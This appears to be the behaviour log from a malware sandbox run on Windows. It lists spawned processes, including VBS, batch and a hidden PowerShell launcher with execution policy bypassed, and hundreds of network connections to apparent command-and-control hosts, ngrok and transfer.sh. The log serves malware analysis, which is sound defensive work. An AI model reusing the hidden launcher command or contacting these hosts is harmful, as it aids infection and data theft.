"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3368 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 2032

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3460 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\ProgramData\presepuesto\LEAJ.exe

C:\ProgramData\presepuesto\LEAJ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 120.207.253.8.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
RU 31.41.244.27:41140 tcp
US 8.8.8.8:53 27.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 8.8.8.8:53 5.tcp.eu.ngrok.io udp
DE 3.67.161.133:15312 5.tcp.eu.ngrok.io tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 133.161.67.3.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
BG 84.54.50.31:80 tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 3.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 63.199.187.89:80 tcp
IT 87.11.67.12:80 tcp
US 19.71.87.92:80 tcp
GB 51.135.15.108:80 tcp
US 164.203.92.128:80 tcp
TW 42.72.114.100:80 tcp
US 205.32.15.92:80 tcp
US 137.106.239.133:80 tcp
US 34.57.47.28:80 tcp
US 67.232.228.250:80 tcp
US 216.110.35.192:80 tcp
DE 178.16.51.144:80 tcp
NO 138.62.146.120:80 tcp
CN 110.231.158.240:80 tcp
HU 109.61.80.71:80 tcp
US 149.119.115.202:8080 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 8.8.8.8:53 71.80.61.109.in-addr.arpa udp
JP 133.48.58.209:80 tcp
CN 110.250.145.63:80 tcp
US 21.78.249.105:443 tcp
US 137.57.26.124:80 tcp
RO 85.186.82.203:80 tcp
KR 222.239.221.241:80 tcp
CA 142.230.198.74:80 tcp
US 55.134.207.25:80 tcp
US 64.30.49.119:80 tcp
US 152.7.226.187:80 tcp
US 139.62.243.79:80 tcp
BG 193.42.32.237:2404 tcp
US 28.4.40.58:8080 tcp
US 70.169.69.31:8080 tcp
US 26.42.40.101:80 tcp
GP 93.121.218.219:80 tcp
RU 90.188.116.49:80 tcp
BG 193.42.32.237:2404 tcp
DE 53.158.172.95:80 tcp
GB 81.144.143.186:80 tcp
AT 212.186.153.64:80 tcp
US 26.104.212.28:80 tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.114.6:443 api.github.com tcp
BG 193.42.32.237:2404 tcp
IN 118.94.114.123:80 tcp
US 8.8.8.8:53 6.114.82.140.in-addr.arpa udp
CN 122.226.168.210:8080 tcp
US 192.3.179.161:80 192.3.179.161 tcp
IL 89.138.94.60:80 tcp
US 147.116.195.79:80 tcp
US 8.8.8.8:53 161.179.3.192.in-addr.arpa udp
MU 137.63.88.203:80 tcp
US 65.17.42.137:80 tcp
BG 193.42.32.237:2404 tcp
US 16.153.161.105:80 tcp
RU 217.116.56.71:80 tcp
US 8.8.8.8:53 github.com udp
US 140.82.114.3:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
CN 120.91.173.133:80 tcp
US 8.8.8.8:53 3.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 api.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 140.82.112.6:443 api.github.com tcp
US 64.192.100.183:80 tcp
CN 101.80.46.100:80 tcp
US 72.116.66.123:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 21.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 6.112.82.140.in-addr.arpa udp
US 56.32.199.70:80 tcp
HK 223.121.87.84:80 tcp
CN 112.116.153.69:80 tcp
DK 109.58.140.89:80 tcp
SG 203.117.33.226:80 tcp
BG 193.42.32.237:2404 tcp
SE 51.12.26.10:443 tcp
AU 103.20.18.141:80 tcp
US 29.139.22.93:443 tcp
US 132.34.108.120:80 tcp
BE 91.181.90.16:443 tcp
SG 4.146.226.108:80 tcp
JP 219.108.193.188:80 tcp
BG 193.42.32.237:2404 tcp
IT 151.16.81.5:443 tcp
BR 179.100.22.253:80 tcp
US 150.221.6.94:80 tcp
BE 213.193.153.42:80 tcp
N/A 127.188.127.83:80 tcp
BG 193.42.32.237:2404 tcp
US 99.42.15.100:80 tcp
TW 1.171.79.172:80 tcp
CA 132.212.201.96:80 tcp
US 34.39.139.84:80 tcp
BE 151.248.51.207:80 tcp
US 38.48.32.129:80 tcp
JP 124.97.128.123:8080 tcp
KE 169.239.254.183:80 tcp
BG 193.42.32.237:2404 tcp
HK 210.24.93.74:80 tcp
SE 104.88.15.4:80 tcp
US 8.8.8.8:53 4.15.88.104.in-addr.arpa udp
US 153.57.55.160:8080 tcp
SA 129.208.216.97:80 tcp
US 204.184.168.127:80 tcp
BG 193.42.32.237:2404 tcp
US 32.45.41.209:80 tcp
JP 218.225.46.87:80 tcp
US 56.9.98.164:80 tcp
US 9.160.164.103:80 tcp
BG 193.42.32.237:2404 tcp
N/A 127.1.75.123:80 tcp
IN 157.41.188.58:80 tcp
AU 120.152.228.55:80 tcp
US 12.195.39.182:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
TR 78.191.193.242:80 tcp
BG 193.42.32.237:2404 tcp
SE 147.180.164.21:80 tcp
NL 188.200.62.111:80 tcp
US 21.71.110.79:80 tcp
US 32.22.190.175:80 tcp
US 55.168.59.251:80 tcp
HK 38.239.195.153:80 tcp
BG 193.42.32.237:2404 tcp
US 97.169.16.241:8080 tcp
US 97.222.17.88:80 tcp
US 8.8.8.8:53 153.195.239.38.in-addr.arpa udp
US 174.68.165.248:80 tcp
US 136.62.204.225:80 tcp
ES 2.153.193.108:80 tcp
BR 177.61.253.73:80 tcp
BG 193.42.32.237:2404 tcp
ZA 41.119.252.47:80 tcp
US 99.205.59.24:80 tcp
IT 151.79.251.10:80 tcp
US 209.172.196.48:80 tcp
BG 193.42.32.237:2404 tcp
IL 77.139.115.196:443 tcp
US 7.209.5.169:80 tcp
RU 45.135.232.2:21308 tcp
US 18.237.233.113:80 tcp
US 71.2.58.230:80 tcp
US 8.8.8.8:53 2.232.135.45.in-addr.arpa udp
CA 99.248.147.232:80 tcp
CN 222.202.118.164:80 tcp
BG 193.42.32.237:2404 tcp
US 6.101.190.164:80 tcp
US 50.116.104.36:80 tcp
US 173.194.208.126:80 tcp
GB 147.150.41.91:80 tcp
US 8.8.8.8:53 126.208.194.173.in-addr.arpa udp
RU 185.149.146.41:17355 tcp
US 205.19.69.5:80 tcp
PK 203.130.12.155:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 41.146.149.185.in-addr.arpa udp
CN 111.131.26.179:80 tcp
GB 25.162.112.115:80 tcp
CN 122.5.219.57:80 tcp
US 54.49.10.156:80 tcp
BG 193.42.32.237:2404 tcp
FI 194.157.148.109:443 tcp
IR 95.64.76.122:8080 tcp
US 167.13.44.179:80 tcp
US 205.245.77.119:80 tcp
TW 218.160.116.58:80 tcp
BG 193.42.32.237:2404 tcp
EG 41.179.90.142:443 tcp
US 99.127.30.195:80 tcp
BG 193.42.32.237:2404 tcp
US 99.89.82.231:8080 tcp
CN 175.56.168.167:443 tcp
FR 176.190.178.59:80 tcp
GB 90.216.88.19:80 tcp
BG 193.42.32.99:80 193.42.32.99 tcp
US 66.235.249.145:80 tcp
BG 193.42.32.237:2404 tcp
US 6.33.4.212:80 tcp
ES 85.137.229.53:80 tcp
US 196.240.29.190:80 tcp
US 8.8.8.8:53 99.32.42.193.in-addr.arpa udp
CN 101.230.132.150:80 tcp
JP 61.126.62.80:80 tcp
US 205.181.215.187:80 tcp
BG 193.42.32.237:2404 tcp
GB 94.237.61.135:443 tcp
CA 142.68.250.157:80 tcp
US 11.53.180.227:80 tcp
US 64.125.119.86:8080 tcp
FR 5.51.184.88:80 tcp
BG 193.42.32.237:2404 tcp
CH 185.246.146.147:80 tcp
US 97.199.146.123:80 tcp
JP 122.217.245.46:80 tcp
IN 117.254.216.123:443 tcp
BG 193.42.32.237:2404 tcp
US 11.92.113.197:80 tcp
ZA 197.105.154.222:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 19.209.34.7:80 tcp
KR 175.219.134.218:80 tcp
US 6.218.152.142:80 tcp
SG 101.46.247.224:80 tcp
BG 193.42.32.237:2404 tcp
US 143.213.90.5:80 tcp
HK 219.77.103.103:80 tcp
US 63.88.74.64:80 tcp
CN 60.160.221.161:80 tcp
JP 219.127.42.158:80 tcp
BG 193.42.32.237:2404 tcp
CN 120.195.251.194:80 tcp
JP 218.251.212.115:80 tcp
US 8.8.8.8:53 www.premiumistudysolution.com udp
CA 142.44.226.116:80 www.premiumistudysolution.com tcp
US 128.218.155.40:80 tcp
US 18.76.83.66:80 tcp
US 8.8.8.8:53 116.226.44.142.in-addr.arpa udp
US 216.249.22.117:80 tcp
CN 119.97.111.69:8080 tcp
US 70.113.52.112:80 tcp
BG 193.42.32.237:2404 tcp
US 135.45.232.228:80 tcp
US 205.117.60.241:80 tcp
US 89.117.55.98:4499 tcp
US 161.180.221.79:443 tcp
US 194.36.36.22:80 tcp
US 155.142.217.164:8080 tcp
US 8.8.8.8:53 98.55.117.89.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
CA 173.180.136.5:80 tcp
US 165.236.230.216:80 tcp
US 11.228.133.9:80 tcp
US 173.160.50.203:443 tcp
IT 88.51.85.56:80 tcp
DE 217.160.37.81:80 tcp
BG 193.42.32.237:2404 tcp
US 24.74.168.4:80 tcp
US 33.10.7.161:80 tcp
CA 24.201.115.234:80 tcp
DE 149.246.166.234:80 tcp
US 71.96.29.154:80 tcp
BG 193.42.32.237:2404 tcp
FR 213.180.253.8:80 tcp
JP 150.84.177.88:80 tcp
TR 5.46.169.138:80 tcp
US 174.63.90.75:80 tcp
DE 144.76.128.184:80 tcp
NL 81.85.40.85:80 tcp
BG 193.42.32.237:2404 tcp
US 143.240.169.133:80 tcp
MX 201.123.133.244:80 tcp
US 169.252.222.10:80 tcp
US 205.197.39.166:80 tcp
US 8.8.8.8:53 www.haztutestamento.com udp
US 34.102.136.180:80 www.haztutestamento.com tcp
BG 193.42.32.237:2404 tcp
US 194.59.30.72:80 tcp
NL 141.93.231.136:80 tcp
US 8.8.8.8:53 180.136.102.34.in-addr.arpa udp
US 4.112.26.185:8080 tcp
US 205.20.190.164:443 tcp
FR 77.156.4.223:80 tcp
DE 153.93.77.227:80 tcp
BG 193.42.32.237:2404 tcp
AR 186.109.132.144:80 tcp
UA 95.134.15.21:80 tcp
US 159.246.112.71:80 tcp
TW 36.230.14.119:80 tcp
CA 134.117.6.51:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 51.6.117.134.in-addr.arpa udp
IT 94.87.231.96:80 tcp
CA 38.3.71.216:80 tcp
US 172.85.247.174:80 tcp
US 63.7.116.181:80 tcp
BG 193.42.32.237:2404 tcp
CN 220.174.229.197:443 tcp
US 171.196.32.107:80 tcp
KR 116.37.34.174:80 tcp
JP 180.11.143.120:80 tcp
BG 193.42.32.237:2404 tcp
US 207.88.246.129:8080 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
IN 103.183.88.123:80 tcp
JP 180.198.110.74:80 tcp
BG 193.42.32.237:2404 tcp
JP 182.23.232.75:80 tcp
GB 217.15.162.206:80 tcp
US 8.8.8.8:53 www.webpanel.cfd udp
IN 180.151.80.24:443 tcp
BG 193.42.32.237:2404 tcp
US 23.96.212.211:443 tcp
JP 203.139.147.245:80 tcp
CN 106.26.37.136:80 tcp
US 209.120.160.229:80 tcp
CN 59.82.212.29:80 tcp
US 33.12.105.104:80 tcp
BG 193.42.32.237:2404 tcp
AR 181.92.219.132:80 tcp
SD 197.208.222.90:80 tcp
FR 13.39.245.134:80 tcp
KR 14.65.232.87:80 tcp
US 29.71.83.73:8080 tcp
NL 109.32.11.117:8080 tcp
BG 193.42.32.237:2404 tcp
US 28.19.248.132:80 tcp
KR 115.6.34.81:80 tcp
US 24.47.122.6:80 tcp
KW 139.141.148.233:80 tcp
BG 193.42.32.237:2404 tcp
US 184.1.191.199:80 tcp
US 26.194.242.245:80 tcp
CN 171.217.157.145:80 tcp
US 156.37.79.40:80 tcp
DE 53.39.98.221:80 tcp
GT 168.234.16.66:80 tcp
BG 193.42.32.237:2404 tcp
IE 54.155.22.30:80 tcp
US 199.122.16.8:80 tcp
US 6.127.248.186:80 tcp
AU 58.166.49.155:80 tcp
US 8.8.8.8:53 phonevronlene.xyz udp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.215.122.150:80 tcp
US 167.122.114.18:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 www.yoyufoods.com udp
DE 217.160.0.55:80 www.yoyufoods.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
DE 51.116.78.150:80 tcp
ZA 197.102.40.91:8080 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 8.8.8.8:53 55.0.160.217.in-addr.arpa udp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 150.234.142.131:80 tcp
UA 178.133.112.222:8080 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
US 207.29.114.180:80 tcp
BE 78.21.198.121:443 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
RU 45.135.232.2:21308 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 135.34.47.87:80 tcp
IN 47.15.60.35:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 215.83.222.184:80 tcp
CA 135.19.3.24:8080 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
JP 220.29.178.152:8080 tcp
MA 196.114.168.177:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
SA 95.184.53.50:8080 tcp
ZM 102.144.31.207:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 57.112.87.100:80 tcp
AU 155.143.52.105:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
SG 43.88.224.16:80 tcp
US 72.175.100.3:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 196.196.233.242:80 tcp
HK 124.244.216.144:80 tcp
FR 51.254.49.49:222 51.254.49.49 tcp
US 150.120.71.110:80 tcp
US 72.196.162.153:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 49.49.254.51.in-addr.arpa udp
US 184.191.39.103:443 tcp
IT 2.117.190.102:443 tcp
CN 112.194.189.22:80 tcp
DE 53.250.139.227:80 tcp
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.42.13:443 onedrive.live.com tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 8.8.8.8:53 nn9w1w.am.files.1drv.com udp
US 13.107.42.12:443 nn9w1w.am.files.1drv.com tcp
US 8.8.8.8:53 13.42.107.13.in-addr.arpa udp
US 188.114.96.0:80 phonevronlene.xyz tcp
DE 87.132.2.120:8080 tcp
AU 168.1.80.222:80 tcp
BG 193.42.32.237:2404 tcp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
US 188.114.96.0:80 phonevronlene.xyz tcp
KR 211.173.187.157:80 tcp
KR 121.164.104.32:443 tcp
N/A 10.6.27.220:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
BG 193.42.32.237:2404 tcp
YE 175.110.7.228:80 tcp
FR 176.167.80.224:80 tcp
US 17.38.250.68:80 tcp
US 153.61.23.28:80 tcp
US 192.3.108.47:80 192.3.108.47 tcp
JP 126.102.1.151:80 tcp
US 8.8.8.8:53 47.108.3.192.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
SE 51.12.152.139:443 tcp
US 135.89.143.190:80 tcp
JP 210.255.39.79:80 tcp
US 209.203.107.215:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 64.115.104.192:80 tcp
TW 118.170.146.3:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
AU 147.10.74.58:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 8.8.8.8:53 marrakechfolkloredays.com udp
US 104.21.83.63:80 marrakechfolkloredays.com tcp
US 104.21.83.63:443 marrakechfolkloredays.com tcp
HK 218.102.162.222:80 tcp
US 69.37.222.168:80 tcp
US 168.38.129.69:80 tcp
US 8.8.8.8:53 63.83.21.104.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
US 24.91.87.182:80 tcp
US 104.30.21.37:80 tcp
FR 78.226.21.107:80 tcp
US 66.80.188.97:80 tcp
BG 193.42.32.237:2404 tcp
US 97.9.250.22:80 tcp
HK 156.250.16.178:80 tcp
US 215.229.95.151:80 tcp
US 8.8.8.8:53 178.16.250.156.in-addr.arpa udp
CN 101.40.98.136:80 tcp
HK 103.200.202.235:80 tcp
US 97.197.18.166:80 tcp
IN 13.234.3.5:80 tcp
BG 193.42.32.237:2404 tcp
CN 113.5.233.115:80 tcp
US 8.8.8.8:53 www.avondalemclarenparts.com udp
US 13.248.148.254:80 www.avondalemclarenparts.com tcp
US 8.8.8.8:53 africatechs.com udp
GB 129.11.145.95:8080 tcp
US 209.156.240.38:80 tcp
US 172.67.140.104:80 africatechs.com tcp
JP 133.60.236.200:80 tcp
US 8.8.8.8:53 transfer.sh udp
US 8.8.8.8:53 254.148.248.13.in-addr.arpa udp
US 8.8.8.8:53 104.140.67.172.in-addr.arpa udp
US 172.67.140.104:443 africatechs.com tcp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
JP 153.227.42.218:80 tcp
EG 197.39.156.76:80 tcp
MX 189.197.184.145:80 tcp
FR 51.254.49.49:222 51.254.49.49 tcp
AU 120.154.4.199:80 tcp
RO 188.119.167.233:80 tcp
BG 193.42.32.237:2404 tcp
US 209.75.80.61:80 tcp
CN 119.98.78.190:80 tcp
US 8.8.8.8:53 233.167.119.188.in-addr.arpa udp
US 47.145.105.42:80 tcp
US 199.2.166.222:80 tcp
US 134.15.20.191:80 tcp
BG 193.42.32.237:2404 tcp
KR 52.231.200.8:8080 tcp
TW 120.108.63.137:80 tcp
NO 161.4.82.188:80 tcp
US 71.152.39.52:443 tcp
KR 223.41.146.62:80 tcp
BG 193.42.32.237:2404 tcp
US 199.171.106.148:80 tcp
GB 25.253.254.119:8080 tcp
US 55.65.245.170:80 tcp
US 157.246.91.4:8080 tcp
US 8.8.8.8:53 api.ipify.org udp
US 173.231.16.76:443 api.ipify.org tcp
GB 86.190.170.144:80 tcp
US 144.71.79.227:80 tcp
US 8.8.8.8:53 76.16.231.173.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
US 158.85.210.242:8080 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 192.20.215.81:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
CN 218.78.183.245:80 tcp
US 8.80.119.129:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
CN 103.222.176.57:80 tcp
US 75.240.221.221:80 tcp
US 8.8.8.8:53 www.firstenergyconp.com udp
US 13.248.148.254:80 www.firstenergyconp.com tcp
CN 116.228.163.198:80 tcp
CN 116.23.175.50:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 149.2.186.32:80 tcp
US 99.134.71.134:80 tcp
BG 193.42.32.237:2404 tcp
US 22.173.59.26:443 tcp
KR 121.171.82.1:443 tcp
RU 5.42.64.33:80 5.42.64.33 tcp
BD 103.202.55.172:65012 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 8.8.8.8:53 33.64.42.5.in-addr.arpa udp
BR 186.208.169.56:80 tcp
MX 187.194.100.179:80 tcp
US 67.39.190.3:80 tcp
RU 82.179.186.205:8080 tcp
BG 193.42.32.237:2404 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 172.188.22.63:80 tcp
US 47.45.89.145:80 tcp
FR 139.124.56.65:80 tcp
MU 156.242.119.47:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 129.115.36.101:80 tcp
KW 62.150.114.185:443 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
CH 141.171.139.203:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
AU 49.182.251.96:8080 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
MX 189.222.249.95:80 tcp
US 134.187.156.137:80 tcp
US 76.236.20.41:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
GB 85.95.105.95:80 tcp
VN 171.227.236.218:80 tcp
EG 156.194.111.226:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
SD 154.98.2.72:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 98.113.226.246:80 tcp
MA 41.248.152.139:80 tcp
US 141.107.125.53:80 tcp
US 8.8.8.8:53 gitlab.com udp
US 188.114.96.0:80 phonevronlene.xyz tcp
DE 217.232.160.7:80 tcp
US 172.65.251.78:443 gitlab.com tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
BG 193.42.32.237:2404 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 8.8.8.8:53 78.251.65.172.in-addr.arpa udp
US 7.52.229.175:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 67.40.54.109:80 tcp
CL 191.116.86.178:443 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 184.132.151.203:80 tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
US 188.114.96.0:80 phonevronlene.xyz tcp
DE 46.252.137.255:80 tcp
BG 193.42.32.237:2404 tcp
RU 128.70.24.30:80 tcp
FR 54.36.43.170:80 tcp
US 40.139.22.64:80 tcp
US 15.166.27.185:80 tcp
BG 193.42.32.237:2404 tcp
FR 54.36.31.172:80 tcp
BR 186.224.140.85:80 tcp
BD 103.202.55.172:65012 tcp
US 8.8.8.8:53 www.abilitytoday.news udp
US 26.114.125.176:8080 tcp
US 130.99.173.134:80 tcp
GB 5.134.9.76:80 www.abilitytoday.news tcp
US 8.8.8.8:53 76.9.134.5.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
DE 77.186.137.142:8080 tcp
